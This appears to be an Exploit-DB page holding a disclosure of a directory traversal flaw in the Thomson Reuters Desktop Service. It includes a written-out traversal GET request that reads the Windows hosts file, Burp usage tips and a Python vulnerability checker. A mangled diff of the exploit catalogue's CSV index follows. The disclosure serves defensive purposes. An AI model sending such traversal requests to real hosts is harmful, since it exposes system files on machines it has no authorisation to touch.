The ThomsonReuters.Desktop.Service.exe or ThomsonReuters.Desktop.exe does not properly handle a modified get request. All version prior to 2.13.0097 of Thomson Reuters Concourse and Firm Central utilize this component, thus they are affected after working with and speaking with the information security team at Thomson Reuters. By default the service listens on 6677, but is sometimes may be listening on ports 7000, 7001 or 7002.
Exploitation:
Currently, this vulnerability is only exploitable by modifying the
request in the repeater module of Port Swigger's Burp suite tool. The
affected component usually on port 6677 by default.
E.g. GET request in burp suite
GET \..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1
Host: host.domain.tld:6677
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: _ga=GA1.2.1239644041.1549987630; _gid=GA1.2.1694605918.1549987630
Upgrade-Insecure-Requests: 1
Additionally, the file path cannot end with
a backslash (\). You will be presented with following error if so -
<h1>Page Not Found</h1>Sorry, we couldn't find what you were looking
for . A sequence of at least five slash-dot-dots (\..) are needed. Furthermore, if you use the intruder module in Burp to automate the process, make sure that the payloads are not being encoded into any format (url encode, b64 encode, etc.) as this will mangle the request and you won't get a response.
The python script checks for the error message by sending a request and looking for the error specified in the response. You can easily do this yourself by simply navigating to the FQDN or IP of the host on port 6677 or other port to see if you get the error in your web browser.
Solution:
Download the latest version
Stop the Thomson Reuters Desktop Extensions service and set the startup type value to disabled using powershell, services.msc, etc.
'''
#!/usr/bin/env python
#######################
# PoC by: 0v3rride #
# DoC: March 2019 #
#######################
from argparse import *;
from requests import *;
def parseArgs():
parser = ArgumentParser();
parser.add_argument("-host", required=True, type=str, help="IP address or FQDN of the host to check");
parser.add_argument("-verbose", required=False, action="store_true", default=False, help="Returns a detailed response from the get request");
parser.add_argument("-tls", required=False, action="store_true", default=False, help="Use this flag is the target host is using https");
parser.add_argument("-port", required=False, type=int, default=6677, help="By default the Thomson Reuters Desktop Service listens on port 6677, but I've also seen it listen on ports 7000-7002");
return parser.parse_args();
def check(cargs):
args = cargs
greq = None;
try:
if args.tls:
greq = get("{}{}:{}".format("https://", args.host, args.port));
elif not args.tls:
greq = get("{}{}:{}".format("http://", args.host, args.port));
else:
greq = get("{}{}:{}".format("http://", args.host, args.port));
if args.verbose:
print("{}:{}".format("Detailed Response", "-"*58));
for hdr in greq.headers.keys():
print("{}: {}".format(hdr, greq.headers[hdr]));
print("\n{}:{}".format("Vulnerability Information", "-"*50));
if greq.text.find("<h1>Page Not Found</h1>Sorry, we couldn't find what you were looking for ") > -1:
print("[!!!]: The target appears to be VULNERABLE to directory traversal!\n");
print("[i]: Use the following GET request value with the repeater tool in Burp Suite to confirm: \\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\Drivers\\etc\\hosts\n");
print("[i]: Make sure the paths you are traversing to don't end with a backslash '\\', otherwise it will not work. You'll know when this happens via an error message in the response.\n");
print("[i]: If you decide to run the request with the intruder tool in Brup Suite, then make sure Brup doesn't encode the payloads as this will not make it work either.\n");
else:
print("[i]: The target DOES NOT appear to be vulnerable to directory traversal. However, there is a chance that the error message was disabled, etc.\n")
print("[i]: You may to try the following GET request value with the repeater tool in Burp Suite to confirm: \\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\Drivers\\etc\\hosts\n");
print("[i]: Make sure the paths you are traversing to don't end with a backslash '\\'.\n");
print("[i]: If you decide to run the request with the intruder tool in Brup Suite, then make sure Brup doesn't encode the payloads as this will not make it work either.\n");
except:
print("[i]: A connection to the target could not be made!\n");
print("[i]: The target may not be vulnerable to directory traversal. Check your information regarding the target and arguments then try again.\n");
def main():
print(r"""
______ _______ ____ ___ _ ___ ___ _____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \/ |/ _ \ ( _ )___ / ( _ ) ___|
| | \ \ / /| _| _____ __) | | | | | (_) |_____ / _ \ |_ \ / _ \___ \
| |___ \ / | |__|_____/ __/| |_| | |\__, |_____| (_) |__) | (_) |__) |
\____| \_/ |_____| |_____|\___/|_| /_/ \___/____/ \___/____/
[*] https://github.com/0v3rride
[*] Script has started...
[*] Use CTRL+C to cancel the script at anytime.
[!]: This script checks to see if the target appears vulnerable, but does not guarantee it! It does not exploit the vulnerability either!
[!]: You might need to use the dos2unix tool for conversion and functionality purposes on a Linux box!
""");
check(parseArgs());
#print(get("http://10.12.8.2:6677").text);
print("[!]: Done!");
#Begin
main();

94
files_exploits.csv
View file

@ -6371,6 +6371,8 @@ id,file,description,date,author,type,platform,port
46604,exploits/windows/dos/46604.txt,"Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)",2019-03-26,ze0r,dos,windows, 46604,exploits/windows/dos/46604.txt,"Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)",2019-03-26,ze0r,dos,windows,
46605,exploits/multiple/dos/46605.html,"Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow",2019-03-26,xuechiyaobai,dos,multiple, 46605,exploits/multiple/dos/46605.html,"Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow",2019-03-26,xuechiyaobai,dos,multiple,
46613,exploits/multiple/dos/46613.js,"Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR",2019-03-26,"Google Security Research",dos,multiple, 46613,exploits/multiple/dos/46613.js,"Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR",2019-03-26,"Google Security Research",dos,multiple,
46621,exploits/windows/dos/46621.py,"Microsoft Visio 2016 16.0.4738.1000 - 'Log in accounts' Denial of Service",2019-03-28,"César Adrián Coronado Llanos",dos,windows,
46626,exploits/linux/dos/46626.txt,"gnutls 3.6.6 - 'verify_crt()' Use-After-Free",2019-03-28,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -6478,7 +6480,7 @@ id,file,description,date,author,type,platform,port
350,exploits/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)",2004-07-14,"Cesar Cerrudo",local,windows, 350,exploits/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)",2004-07-14,"Cesar Cerrudo",local,windows,
351,exploits/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,local,windows, 351,exploits/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,local,windows,
352,exploits/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)",2004-07-17,kralor,local,windows, 352,exploits/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)",2004-07-17,kralor,local,windows,
353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows, 353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows,
355,exploits/windows/local/355.c,"Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)",2004-07-20,kralor,local,windows, 355,exploits/windows/local/355.c,"Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)",2004-07-20,kralor,local,windows,
367,exploits/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,local,osx, 367,exploits/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,local,osx,
368,exploits/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal (MS04-022)",2004-07-31,houseofdabus,local,windows, 368,exploits/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal (MS04-022)",2004-07-31,houseofdabus,local,windows,
@ -9029,8 +9031,8 @@ id,file,description,date,author,type,platform,port
26703,exploits/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,local,windows, 26703,exploits/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,local,windows,
26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows, 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,
26709,exploits/linux_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation",2013-07-09,"Larry W. Cashdollar",local,linux_x86, 26709,exploits/linux_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation",2013-07-09,"Larry W. Cashdollar",local,linux_x86,
26752,exploits/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,local,windows, 26752,exploits/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence (1)",2005-12-06,Endrazine,local,windows,
26753,exploits/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,local,unix, 26753,exploits/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)",2005-12-06,Endrazine,local,unix,
26805,exploits/windows/local/26805.rb,"Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,local,windows, 26805,exploits/windows/local/26805.rb,"Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,local,windows,
26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow",2013-07-16,PuN1sh3r,local,windows, 26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow",2013-07-16,PuN1sh3r,local,windows,
40385,exploits/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)",2016-09-15,Metasploit,local,netbsd_x86, 40385,exploits/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)",2016-09-15,Metasploit,local,netbsd_x86,
@ -9215,7 +9217,7 @@ id,file,description,date,author,type,platform,port
32358,exploits/windows/local/32358.pl,"MP3Info 0.8.5a - Local Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",local,windows, 32358,exploits/windows/local/32358.pl,"MP3Info 0.8.5a - Local Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",local,windows,
32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware, 32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,
32446,exploits/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",local,linux, 32446,exploits/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",local,linux,
32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",local,multiple, 32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities",2008-10-21,"Flavio D. Garcia",local,multiple,
32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation",2008-11-07,alex,local,windows, 32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation",2008-11-07,alex,local,windows,
32585,exploits/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,local,windows, 32585,exploits/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,local,windows,
32590,exploits/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",local,windows, 32590,exploits/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",local,windows,
@ -9266,7 +9268,7 @@ id,file,description,date,author,type,platform,port
33523,exploits/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",local,linux, 33523,exploits/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",local,linux,
33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux, 33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux,
33614,exploits/linux/local/33614.c,"dbus-glib pam_fprintd - Local Privilege Escalation",2014-06-02,"Sebastian Krahmer",local,linux, 33614,exploits/linux/local/33614.c,"dbus-glib pam_fprintd - Local Privilege Escalation",2014-06-02,"Sebastian Krahmer",local,linux,
33623,exploits/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations",2010-02-10,"Tim Brown",local,linux, 33623,exploits/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction / Privilege Escalations",2010-02-10,"Tim Brown",local,linux,
33725,exploits/aix/local/33725.txt,"IBM AIX 6.1.8 - 'libodm' Arbitrary File Write",2014-06-12,Portcullis,local,aix, 33725,exploits/aix/local/33725.txt,"IBM AIX 6.1.8 - 'libodm' Arbitrary File Write",2014-06-12,Portcullis,local,aix,
40342,exploits/windows_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",local,windows_x86-64, 40342,exploits/windows_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",local,windows_x86-64,
33791,exploits/arm/local/33791.rb,"Adobe Reader for Android < 11.2.0 - 'addJavascriptInterface' Local Overflow (Metasploit)",2014-06-17,Metasploit,local,arm, 33791,exploits/arm/local/33791.rb,"Adobe Reader for Android < 11.2.0 - 'addJavascriptInterface' Local Overflow (Metasploit)",2014-06-17,Metasploit,local,arm,
@ -9297,7 +9299,7 @@ id,file,description,date,author,type,platform,port
34421,exploits/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One",2014-08-27,"taviso & scarybeasts",local,linux, 34421,exploits/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One",2014-08-27,"taviso & scarybeasts",local,linux,
34489,exploits/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,local,windows, 34489,exploits/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,local,windows,
34512,exploits/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,local,windows, 34512,exploits/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,local,windows,
34537,exploits/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",local,linux, 34537,exploits/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation",2010-08-26,"Micha Riser",local,linux,
34648,exploits/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape",2014-09-13,"Joxean Koret",local,windows, 34648,exploits/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape",2014-09-13,"Joxean Koret",local,windows,
34822,exploits/windows/local/34822.c,"Microsoft Windows - Local Procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,local,windows, 34822,exploits/windows/local/34822.c,"Microsoft Windows - Local Procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,local,windows,
34923,exploits/linux/local/34923.c,"Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation",2014-10-09,"Andy Lutomirski",local,linux, 34923,exploits/linux/local/34923.c,"Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation",2014-10-09,"Andy Lutomirski",local,linux,
@ -9426,9 +9428,9 @@ id,file,description,date,author,type,platform,port
37089,exploits/linux/local/37089.txt,"Fuse 2.9.3-15 - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",local,linux, 37089,exploits/linux/local/37089.txt,"Fuse 2.9.3-15 - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",local,linux,
37098,exploits/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",local,windows, 37098,exploits/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",local,windows,
37197,exploits/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Local Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",local,windows, 37197,exploits/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Local Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",local,windows,
37167,exploits/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions",2015-06-01,"Hacker Fantastic",local,linux, 37167,exploits/linux/local/37167.c,"Linux Kernel (PonyOS 3.0) - VFS Permissions Local Privilege Escalation",2015-06-01,"Hacker Fantastic",local,linux,
37168,exploits/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",local,linux, 37168,exploits/linux/local/37168.txt,"Linux Kernel (PonyOS 3.0) - ELF Loader Local Privilege Escalation",2015-06-01,"Hacker Fantastic",local,linux,
37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation",2015-06-02,"Hacker Fantastic",local,linux, 37183,exploits/linux/local/37183.c,"Linux Kernel (PonyOS 3.0) - TTY 'ioctl()' Local Privilege Escalation",2015-06-02,"Hacker Fantastic",local,linux,
37211,exploits/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow",2015-06-05,metacom,local,windows, 37211,exploits/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow",2015-06-05,metacom,local,windows,
37212,exploits/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,local,windows, 37212,exploits/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,local,windows,
37265,exploits/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation",2015-06-11,"Andrew Widdersheim",local,linux, 37265,exploits/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation",2015-06-11,"Andrew Widdersheim",local,linux,
@ -9890,7 +9892,7 @@ id,file,description,date,author,type,platform,port
41870,exploits/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",local,multiple, 41870,exploits/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",local,multiple,
41871,exploits/solaris/local/41871.sh,"Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",local,solaris, 41871,exploits/solaris/local/41871.sh,"Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",local,solaris,
41873,exploits/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation",2017-04-13,"Hacker Fantastic",local,osx, 41873,exploits/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation",2017-04-13,"Hacker Fantastic",local,osx,
41875,exploits/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation",2017-04-02,"Hacker Fantastic",local,linux, 41875,exploits/linux/local/41875.py,"Linux Kernel (PonyOS 4.0) - 'fluttershy' LD_LIBRARY_PATH Local Privilege Escalation",2017-04-02,"Hacker Fantastic",local,linux,
41878,exploits/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Local Privilege Escalation",2017-04-13,hyp3rlinx,local,windows, 41878,exploits/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Local Privilege Escalation",2017-04-13,hyp3rlinx,local,windows,
42548,exploits/windows/local/42548.py,"Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows, 42548,exploits/windows/local/42548.py,"Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows,
41901,exploits/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",local,windows, 41901,exploits/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",local,windows,
@ -10095,9 +10097,9 @@ id,file,description,date,author,type,platform,port
44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, 44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows, 44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows,
44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows, 44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows,
44478,exploits/windows_x86/local/44478.cpp,"Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, 44478,exploits/windows_x86/local/44478.cpp,"Microsoft Windows Manager (7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86, 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86, 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86, 44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86,
44516,exploits/windows/local/44516.py,"RGui 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows, 44516,exploits/windows/local/44516.py,"RGui 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,
44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows, 44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows,
@ -10373,7 +10375,7 @@ id,file,description,date,author,type,platform,port
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64, 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,
46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware, 46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware,
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows, 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows, 46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows,
46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows, 46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows, 46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
@ -10381,6 +10383,7 @@ id,file,description,date,author,type,platform,port
46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows, 46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows,
46600,exploits/windows/local/46600.txt,"VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows, 46600,exploits/windows/local/46600.txt,"VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
46601,exploits/windows/local/46601.txt,"VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows, 46601,exploits/windows/local/46601.txt,"VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
46625,exploits/windows/local/46625.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)",2019-03-28,"Paolo Perego",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -10501,7 +10504,7 @@ id,file,description,date,author,type,platform,port
